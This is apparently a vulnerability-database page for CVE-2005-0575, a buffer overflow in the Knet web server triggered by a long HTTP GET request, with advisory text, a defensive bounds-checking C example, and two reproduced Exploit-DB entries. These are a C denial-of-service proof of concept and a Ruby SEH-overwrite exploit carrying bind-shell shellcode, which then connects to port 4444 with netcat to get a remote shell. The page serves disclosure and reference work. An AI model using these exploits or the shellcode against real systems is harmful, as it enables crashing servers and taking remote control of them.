CVE-2005-0575
CVSS7.5
Published: 2005-05-02 00:00:00
Last modified: 2016-10-17 23:12:52

[Original] Buffer overflow in Stormy Studios Knet 1.04c and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP GET request.


[CNNVD] Knet Remote Buffer Overflow Vulnerability (CNNVD-200505-130)

        Knet is a simple web server program.
        Knet lacks proper bounds checking on GET requests, and a remote attacker can exploit this to execute arbitrary instructions on the system with the privileges of the process. Sending a GET request longer than 522 bytes to Knet crashes the program; carefully crafted request data may allow arbitrary instructions to be executed with the process's privileges.
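The missing bounds check described above, shown as an added example that is not Knet's code (Knet's source is not on this page): a request-target parser that answers an oversized GET line with 414 instead of copying it into a fixed buffer. MAX_TARGET, the Z-filled request builder and the function names are assumptions for illustration.

```c
/* Added illustration, not Knet's source (not on this page): a request-line
 * parser with the bound check the advisory says Knet lacks. MAX_TARGET is an
 * assumed buffer size near the reported 522-byte crash point, not Knet's. */
#include <string.h>

#define MAX_TARGET 512

/* The defect class the advisory describes looks like this (do not use):
 *     char target[MAX_TARGET];
 *     sscanf(line, "GET %s", target);   // no width limit: overruns target */
/* Copy the request-target of "GET <target> ..." into out[outsz]. Returns 200
 * when it fits, 400 for a malformed line, 414 (URI Too Long) otherwise. */
int parse_get_target(const char *line, char *out, size_t outsz)
{
    const char *p;
    size_t len;
    if (strncmp(line, "GET ", 4) != 0)
        return 400;
    p = line + 4;
    len = strcspn(p, " \r\n");      /* target ends at SP, CR or LF */
    if (len == 0)
        return 400;
    if (len >= outsz)               /* keep room for the terminator */
        return 414;
    memcpy(out, p, len);
    out[len] = '\0';
    return 200;
}

/* Build "GET " + n bytes of 'Z' + " HTTP/1.0\r\n": constructed input in the
 * shape of the page's PoC (1023-byte filler). Returns 0 if buf is too small. */
size_t build_long_get(char *buf, size_t bufsz, size_t n)
{
    if (bufsz < n + 4 + 12)
        return 0;
    memcpy(buf, "GET ", 4);
    memset(buf + 4, 'Z', n);
    memcpy(buf + 4 + n, " HTTP/1.0\r\n", 12);   /* 11 chars plus NUL */
    return 4 + n + 11;
}

/* Status the hardened handler would answer to an n-byte request-target. */
int status_for_target_len(size_t n)
{
    char line[2048], target[MAX_TARGET];
    if (build_long_get(line, sizeof line, n) == 0)
        return -1;
    return parse_get_target(line, target, sizeof target);
}
```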
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:stormy_studios:knet:1.4c
cpe:/a:stormy_studios:knet:1.0
cpe:/a:stormy_studios:knet:1.2
cpe:/a:stormy_studios:knet:1.3
cpe:/a:stormy_studios:knet:1.4b

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0575
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0575
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-130
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110943766505666&w=2
(UNKNOWN)  BUGTRAQ  20050225 Knet <= 1.04c Buffer Overflow Bug
http://www.exploit-db.com/exploits/24897
(UNKNOWN)  EXPLOIT-DB  24897
http://www.exploit-db.com/exploits/24950
(UNKNOWN)  EXPLOIT-DB  24950
http://www.securityfocus.com/bid/12671
(UNKNOWN)  BID  12671

- Vulnerability information

Knet Remote Buffer Overflow Vulnerability
High risk  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
        Knet is a simple web server program.
        Knet lacks proper bounds checking on GET requests, and a remote attacker can exploit this to execute arbitrary instructions on the system with the privileges of the process. Sending a GET request longer than 522 bytes to Knet crashes the program; carefully crafted request data may allow arbitrary instructions to be executed with the process's privileges.
        

- Advisory and patches

        The vendor has released an upgrade patch to fix this issue; it can be obtained at:
        http://www.stormystudios.com/

- Vulnerability information (843)

Knet <= 1.04c Buffer Overflow Denial of Service Exploit (EDBID:843)
windows dos
2005-02-25 Verified
0 CorryL
N/A
-=[--------------------ADVISORY-------------------]=-
-=[                                                  ]=-
-=[     Knet <= 1.04c                                ]=-
-=[                                                  ]=-
-=[  Author: CorryL  [corryl80@gmail.com]            ]=-
-=[                                  x0n3-h4ck.org   ]=-
-=[--------------------------------------------------]=-

-=[+] Application:    Knet
-=[+] Version:        1.04c
-=[+] Vendor's URL:   www.stormystudios.com
-=[+] Platform:       Windows
-=[+] Bug type:       Buffer overflow
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:         CorryL  ~ CorryL[at]gmail[dot]com ~
-=[+] Reference:      www.x0n3-h4ck.org

..::[ Description ]::..

Knet is a small HTTP server, easy to install and use.

..::[ Bug ]::..

This software is affected by a buffer overflow.
A malicious attacker sending the request GET AAAAAA..... to 522
causes the EIP register to be overwritten, leading to the execution of
malicious code.

..::[ Proof Of Concept ]::..

GET AAAAAAAAAAAAAAAAAAAAAAAAAA......... to 522 byte long

..::[ Exploit ]::..

/*

     KNet <= 1.04c is affected by a remote buffer overflow in the GET command.
  This PoC demonstrates the vulnerability.

     KNet <= 1.04c     PoC Denial Of Service       Coded by: Expanders

     Usage:  ./x0n3-h4ck_Knet-DoS.c <Host> <Port>

*/

#include <stdio.h>
#include <stdlib.h>      /* exit, malloc, free, atoi */
#include <string.h>
#include <unistd.h>      /* close */
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);

int main(int argc, char *argv[]) {

    struct sockaddr_in trg;
    struct hostent *he;
    int sockfd, rc;
    char evilbuf[1024];      /* filler that overruns Knet's GET buffer */
    char *request;

    if (argc < 3) {
        help(argv[0]);
        exit(0);
    }
    printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");

    /* resolve the target and open a TCP socket */
    he = gethostbyname(argv[1]);
    if (he == NULL) {
        printf("[Fail] -> Unable to resolve %s\n\n", argv[1]);
        exit(1);
    }
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    request = (char *) malloc(12344);

    trg.sin_family = AF_INET;
    trg.sin_port = htons(atoi(argv[2]));
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '\0', 8);

    printf("\n\nConnecting to target \t...");
    rc = connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
    if (rc == 0) {
        printf("[Done]\nBuilding evil buffer\t...");
        memset(evilbuf, 90, 1023);     /* 1023 x 'Z', well past the 522-byte limit */
        evilbuf[1023] = '\0';          /* terminate so %s below stops here */
        printf("[Done]\nSending evil request   \t...");
        sprintf(request, "GET %s \n\r\n\r", evilbuf);   /* line ending as in the original PoC */
        send(sockfd, request, strlen(request), 0);
        printf("[Done]\n\n[Finished] Check the server now\n");
    }
    else
        printf("[Fail] -> Unable to connect\n\n");

    free(request);
    close(sockfd);
    return 0;
}

void help(char *program_name) {

    printf("\n\t-=[      KNet <= 1.04b PoC Denial Of Service      ]=-\n");
    printf("\t-=[                                                    ]=-\n");
    printf("\t-=[      Coded by ders -/www.x0n3-h4ck.org\\-      ]=-\n\n");
    printf("Usage: %s <Host> <Port>\n", program_name);
}

// milw0rm.com [2005-02-25]

- Vulnerability information (24897)

KNet Web Server 1.04b - Buffer Overflow SEH (EDBID:24897)
windows remote
2013-03-29 Verified
0 Myo Soe
#!/usr/bin/ruby

# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b 
# Tested on: Windows 7

require 'net/http'
require 'uri'
require 'socket'
############################################

# bind port 4444
sc_bind = 
"\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" +
"\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" +
"\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" +
"\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" +
"\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\x64" +
"\x88\x2e\x08\xbb\x7c\x85\x13\xec\x2c\x92\x5c\x14\x47\xfc" +
"\x7c\x25\x84\x1e\x40\x6c\xa1\xd5\x32\x6f\x63\x24\xba\x41" +
"\x4b\xeb\x85\x6d\x46\xf5\xc2\x4a\xb8\x80\x38\xa9\x45\x93" +
"\xfa\xd3\x91\x16\x1f\x73\x52\x80\xfb\x85\xb7\x57\x8f\x8a" +
"\x7c\x13\xd7\x8e\x83\xf0\x63\xaa\x08\xf7\xa3\x3a\x4a\xdc" +
"\x67\x66\x09\x7d\x31\xc2\xfc\x82\x21\xaa\xa1\x26\x29\x59" +
"\xb6\x51\x70\x36\x7b\x6c\x8b\xc6\x13\xe7\xf8\xf4\xbc\x53" +
"\x97\xb4\x35\x7a\x60\xba\x6c\x3a\xfe\x45\x8e\x3b\xd6\x81" +
"\xda\x6b\x40\x23\x62\xe0\x90\xcc\xb7\xa7\xc0\x62\x67\x08" +
"\xb1\xc2\xd7\xe0\xdb\xcc\x08\x10\xe4\x06\x3f\x16\x2a\x72" +
"\x6c\xf1\x4f\x84\x83\x5d\xd9\x62\xc9\x4d\x8f\x3d\x65\xac" +
"\xf4\xf5\x12\xcf\xde\xa9\x8b\x47\x56\xa4\x0b\x67\x67\xe2" +
"\x38\xc4\xcf\x65\xca\x06\xd4\x94\xcd\x02\x7c\xde\xf6\xc5" +
"\xf6\x8e\xb5\x74\x06\x9b\x2d\x14\x95\x40\xad\x53\x86\xde" +
"\xfa\x34\x78\x17\x6e\xa9\x23\x81\x8c\x30\xb5\xea\x14\xef" +
"\x06\xf4\x95\x62\x32\xd2\x85\xba\xbb\x5e\xf1\x12\xea\x08" +
"\xaf\xd4\x44\xfb\x19\x8f\x3b\x55\xcd\x56\x70\x66\x8b\x56" +
"\x5d\x10\x73\xe6\x08\x65\x8c\xc7\xdc\x61\xf5\x35\x7d\x8d" +
"\x2c\xfe\x8d\xc4\x6c\x57\x06\x81\xe5\xe5\x4b\x32\xd0\x2a" +
"\x72\xb1\xd0\xd2\x81\xa9\x91\xd7\xce\x6d\x4a\xaa\x5f\x18" +
"\x6c\x19\x5f\x09"

###########################################


sploit = "\x90" * 1234
sploit += "\xFF\x64\x24\x5C"  # nseh | JMP [ESP+5C] FF6424 5C ; will jump to Shell Code  at ESP+5C
sploit += "\xE3\x74\x24\x6C"  # seh  | Found pop esi - pop ebp - ret at 0x6C2474E3 [crtdll.dll]
sploit += "\x90" * 80  

sploit += sc_bind
sploit += "\x90" * 80

########################################

puts "KNet Web Server - Buffer Overflow SEH Exploit\r\n by Myo Soe, http://yehg.net/\n\n"
target = ARGV[0]

def exploit(t,s)
	target = 'http://' + t
	sploit = s
	puts "[*] Sending exploit to #{target}...\n"
	url = URI.parse(target)
	res = Net::HTTP.start(url.host, url.port) {|http|
	http.get('/' + sploit)
	}
end 
def connect(t)
	sleep(1)
	target = t
	puts "[*] Opening Shell ..\n\n";
	system("nc #{target} 4444")
end 
t1=Thread.new{exploit(target,sploit)}
t2=Thread.new{connect(target)}
t1.join
t2.join

- Vulnerability information

14239
Stormy Studios KNet HTTP GET Request Handling Remote Buffer Overflow
Remote / Network Access, Input Manipulation
Loss of Integrity, Solution Unknown
Exploit Public, Uncoordinated Disclosure

- Vulnerability description

Stormy Studios KNet contains an overflow condition that is triggered as user-supplied input is not properly validated when handling HTTP GET requests. With a specially crafted request, a remote attacker can cause a stack-based buffer overflow, allowing the execution of arbitrary code.

- Timeline

2005-02-25 Unknown
2013-03-29 Unknown

- Solution

OSVDB is not currently aware of a solution for this vulnerability.

- References

- Credit

Unknown or Incomplete